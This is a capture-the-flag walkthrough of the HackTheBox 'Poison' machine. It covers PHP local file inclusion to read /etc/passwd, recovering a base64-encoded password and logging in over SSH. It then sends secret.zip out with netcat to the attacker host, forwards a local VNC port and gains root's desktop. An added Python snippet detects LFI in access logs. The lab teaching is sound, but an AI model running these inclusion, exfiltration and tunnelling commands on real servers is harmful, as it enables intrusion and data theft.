来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/
Poison is a fairly easy CTF box on HackTheBox, but it does include a few interesting and unusual things.
As usual, let's start with a quick nmap scan.
root@kali:~# nmap -sV 10.10.10.84
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Let's look at the page on port 80 in a browser.
We can check each of these filenames in turn in the Scriptname field. When we submit listfiles.php, the page outputs the following:
Note the form of the URL: the way it loads these files may be vulnerable to LFI.
Let's look at pwdbackup.txt first, since that file looks interesting.
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Encoded 13 times. Fine, let's write a quick Python script to decode it instead of running the decode by hand thirteen times.
```python
import base64

# The base64 blob from pwdbackup.txt goes here (its contents are omitted on this page).
string = """<base64 contents of pwdbackup.txt>"""

def decode(b64_string, iterations):
    # Peel off one layer of base64 per iteration.
    i = 0
    while i < iterations:
        b64_string = base64.b64decode(b64_string).decode('utf-8')
        i += 1
    print(b64_string)

decode(string, 13)
```
Test and run the script:
root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0
OK! We have the password, but we still need to know the username.
Let's test whether the LFI vulnerability is really there.
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd
<br />
<b>Warning</b>: include(../../../etc/passwd): failed to open stream: No such file or directory in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: include(): Failed opening '../../../etc/passwd' for inclusion (include_path='.:/usr/local/www/apache24/data') in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />
Here we can see that include() is indeed used, and we also see the include path, so we need to go up five directory levels to reach the root.
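As an added example (not code from the original writeup), the following Python looks at the same include() behaviour from the defender's side: it resolves a file= value against the web root seen in the PHP warning, flags values that leave that root, shows a hardened allowlist check in place of include($_GET['file']), and runs the detection over Apache access-log lines. The allowlist and the log lines are constructed for this example.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Web root taken from the include_path in the PHP warning quoted above.
DOCROOT = "/usr/local/www/apache24/data"
# Constructed allowlist for the hardened check; only names that appear in this writeup.
ALLOWED_FILES = {"listfiles.php", "pwdbackup.txt"}

def levels_to_root(docroot=DOCROOT):
    """Number of '../' needed to climb from the web root to '/' (5 for this box)."""
    return len([p for p in docroot.split("/") if p])

def resolve_include(file_param, docroot=DOCROOT):
    """Path that include($_GET['file']) opens; unquote() is a second decode after parse_qs."""
    return posixpath.normpath(posixpath.join(docroot, unquote(file_param)))

def escapes_docroot(file_param, docroot=DOCROOT):
    """True when the parameter leaves the web root or names a stream wrapper (x://)."""
    if "://" in unquote(file_param):
        return True
    resolved = resolve_include(file_param, docroot)
    return resolved != docroot and not resolved.startswith(docroot + "/")

def safe_include_target(file_param, docroot=DOCROOT):
    """Hardened replacement for include($_GET['file']): bare allowlisted names only."""
    name = unquote(file_param)
    if name not in ALLOWED_FILES or escapes_docroot(name, docroot):
        return None
    return posixpath.join(docroot, name)

# Constructed Apache access-log lines replaying the requests made in this writeup.
ACCESS_LOG = """\
10.10.14.8 - - [24/Apr/2018:12:40:01 -0500] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 88
10.10.14.8 - - [24/Apr/2018:12:41:15 -0500] "GET /browse.php?file=../../../etc/passwd HTTP/1.1" 200 420
10.10.14.8 - - [24/Apr/2018:12:42:03 -0500] "GET /browse.php?file=../../../../../etc/passwd HTTP/1.1" 200 2214
10.10.14.8 - - [24/Apr/2018:12:43:09 -0500] "GET /browse.php?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2214
"""

def find_lfi_attempts(log_text, docroot=DOCROOT):
    """Return (client, decoded file= value, resolved path) for every request leaving the web root."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        query = parse_qs(urlsplit(m.group(1)).query) if m else {}  # parse_qs decodes %XX once
        for value in query.get("file", []):
            if escapes_docroot(value, docroot):
                hits.append((line.split()[0], value, resolve_include(value, docroot)))
    return hits
```

The three-level request is flagged too, even though it failed on the box: it still resolved to /usr/local/etc/passwd, outside the web root, which is the signal a defender wants.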
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
We see a user named charix.
Let's try ssh with that username and the password we recovered.
root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
http://www.FreeBSD.org/search/search.html
charix@Poison:~ %
Excellent!
Looking around the home directory, we see a suspicious zip file.
charix@Poison:~ % ls -al
total 48
drwxr-x--- 2 charix charix 512 Mar 19 17:16 .
drwxr-xr-x 3 root wheel 512 Mar 19 16:08 ..
-rw-r----- 1 charix charix 1041 Mar 19 17:16 .cshrc
-rw-rw---- 1 charix charix 0 Mar 19 17:17 .history
-rw-r----- 1 charix charix 254 Mar 19 16:08 .login
-rw-r----- 1 charix charix 163 Mar 19 16:08 .login_conf
-rw-r----- 1 charix charix 379 Mar 19 16:08 .mail_aliases
-rw-r----- 1 charix charix 336 Mar 19 16:08 .mailrc
-rw-r----- 1 charix charix 802 Mar 19 16:08 .profile
-rw-r----- 1 charix charix 281 Mar 19 16:08 .rhosts
-rw-r----- 1 charix charix 849 Mar 19 16:08 .shrc
-rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip
-rw-r----- 1 root charix 33 Mar 19 16:11 user.txt
Let's transfer the zip file to our local machine with netcat.
charix@Poison:~ % nc -w 2 10.10.14.8 443 < secret.zip
root@kali:~/htb/poison# nc -lvnp 443 > secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787
The zip file is password protected, but we can try the charix user's ssh password to extract it. It works!
root@kali:~/htb/poison# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
Checking the file type, we see that it should be a regular ASCII file.
root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!
However, the file contents are just garbage characters.
Let's take a closer look at the server.
Checking the running processes with ps aux, we see a few interesting things.
root 529 0.0 0.9 23620 8996 v0- I 19:17 0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root 540 0.0 0.7 67220 7060 v0- I 19:17 0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop
We also see some ports listening on the local interface.
charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.8.44976 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
udp4 0 0 *.514 *.*
udp6 0 0 *.514 *.*
Ports 5801 and 5901 are typically used by VNC, which matches the running VNC session we saw in the process list. Let's forward the port to our local machine so we can reach it (make sure SSH is running on your local machine!).
charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#
If we check the listening connections on Kali, we can see that the port forward succeeded.
root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:5801 0.0.0.0:* LISTEN
tcp 0 0 10.10.14.8:44976 10.10.10.84:22 ESTABLISHED
tcp 0 0 10.10.14.8:22 10.10.10.84:54672 ESTABLISHED
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 ::1:5801 :::* LISTEN
Vncviewer supports a -passwd option, so we can pass it a passwd file for authentication, which means we can probably pass it the secret file we obtained earlier.
root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [<OPTIONS>] [<HOST>][:<DISPLAY#>]
vncviewer [<OPTIONS>] [<HOST>][::<PORT#>]
vncviewer [<OPTIONS>] -listen [<DISPLAY#>]
vncviewer -help
<OPTIONS> are standard Xt options, or:
-via <GATEWAY>
-shared (set by default)
-noshared
-viewonly
-fullscreen
-noraiseonbeep
-passwd <PASSWD-FILENAME> (standard VNC authentication)
root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
That's it, we're in!